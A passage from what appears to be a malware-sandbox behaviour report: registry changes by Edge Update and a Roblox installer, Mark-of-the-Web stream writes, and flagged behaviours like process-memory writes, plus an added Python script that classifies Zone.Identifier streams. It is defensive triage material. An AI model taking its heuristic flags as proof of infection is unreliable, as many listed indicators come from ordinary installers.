| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133690977403636301" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass.1\ = "Microsoft Edge Update Core Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassSvc\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ = "IGoogleUpdate3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher.1.0\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-3000" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\CLSID\ = "{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService\CLSID\ = "{CECDDD22-2E72-4832-9606-A9B0E5E344B2}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\LocalService = "edgeupdatem" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\NumMethods\ = "26" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ = "IAppCommandWeb" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\NumMethods\ = "16" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-86c3597a87f4495e\\RobloxPlayerBeta.exe\" %1" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-86c3597a87f4495e\\RobloxPlayerBeta.exe" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher.1.0 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\ = "URL: Roblox Protocol" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8B15189E-5465-4166-933D-1EABAD9648CB}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ = "IGoogleUpdateCore" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation\Enabled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\ = "URL: Roblox Protocol" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ = "IPolicyStatusValue" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Debug.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
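Both rows show chrome.exe writing the Zone.Identifier stream on the two files it downloaded, which is the browser applying Mark-of-the-Web as intended; the triage question is whether the files that ran later still carried that stream, since a payload copied or unpacked by a tool that does not propagate the stream arrives unmarked and skips the MotW-aware checks. The Python below is an added example, not part of the report: it parses the stream's [ZoneTransfer] fields and classifies each file by zone. SAMPLE_STREAMS is constructed to resemble what Chrome writes (the URLs are placeholders and the "extracted" path is hypothetical, not a file from the report); read_stream() returns real data only for files on an NTFS volume under Windows, where the stream is opened as `path:Zone.Identifier`.

```python
"""Read and classify Zone.Identifier (Mark-of-the-Web) streams on downloads.

Added example, not part of the original report. SAMPLE_STREAMS is constructed
to resemble what Chrome writes; the URLs are placeholders and the 'extracted'
file is hypothetical. read_stream() needs an NTFS volume on Windows.
"""

# URLZONE values as they appear in the ZoneId field.
ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}

# Constructed sample: file names taken from the report's NTFS ADS rows, stream
# text shaped like Chrome's; None models a file whose stream is absent.
SAMPLE_STREAMS = {
    r"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe":
        "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example.invalid/\r\n"
        "HostUrl=https://example.invalid/download\r\n",
    r"C:\Users\Admin\Downloads\Debug.zip": "[ZoneTransfer]\r\nZoneId=3\r\n",
    # Hypothetical: a file unpacked from the archive by a tool that dropped the stream.
    r"C:\Users\Admin\Downloads\extracted\payload.exe": None,
}


def parse_zone_identifier(text):
    """Parse the INI-style stream into a dict; values may themselves contain '='."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        name, _, value = line.partition("=")
        fields[name.strip()] = value.strip()
    return fields


def read_stream(path):
    """Return the file's Zone.Identifier text, or None if it has none.
    Works only on NTFS under Windows; on other platforms every file looks unmarked."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def assess(path, stream):
    """Classify one file from its stream text (None means no stream present)."""
    if stream is None:
        return {"file": path, "zone": None, "zone_name": None, "origin": None,
                "verdict": "no MotW: never marked, or stream dropped on copy/extract"}
    fields = parse_zone_identifier(stream)
    try:
        zone = int(fields.get("ZoneId", ""))
    except ValueError:
        zone = None
    if zone is None:
        verdict = "malformed stream"
    elif zone >= 3:
        verdict = "MotW present: SmartScreen and MotW-aware policy apply"
    else:
        verdict = "zone below Internet: not treated as a download"
    return {"file": path, "zone": zone, "zone_name": ZONES.get(zone),
            "origin": fields.get("HostUrl") or fields.get("ReferrerUrl"),
            "verdict": verdict}


def assess_all(streams):
    """Assess a {path: stream_text_or_None} mapping, e.g. built with read_stream()."""
    return [assess(p, s) for p, s in streams.items()]


if __name__ == "__main__":
    for r in assess_all(SAMPLE_STREAMS):
        print(f"{r['file']}\n  zone={r['zone']} ({r['zone_name']}) origin={r['origin']}\n  {r['verdict']}")
```

On a live Windows host, build the mapping with `{p: read_stream(p) for p in paths}` over the Downloads folder and anything the sandbox lists as dropped; HostUrl, when present, records where the file actually came from and is the first pivot for blocking the hosting URL. Keep in mind that Explorer propagates the stream to files it extracts from a zip while some third-party extractors do not, so an unmarked file next to a marked archive is a finding, not necessarily a bypass by the malware itself.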
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
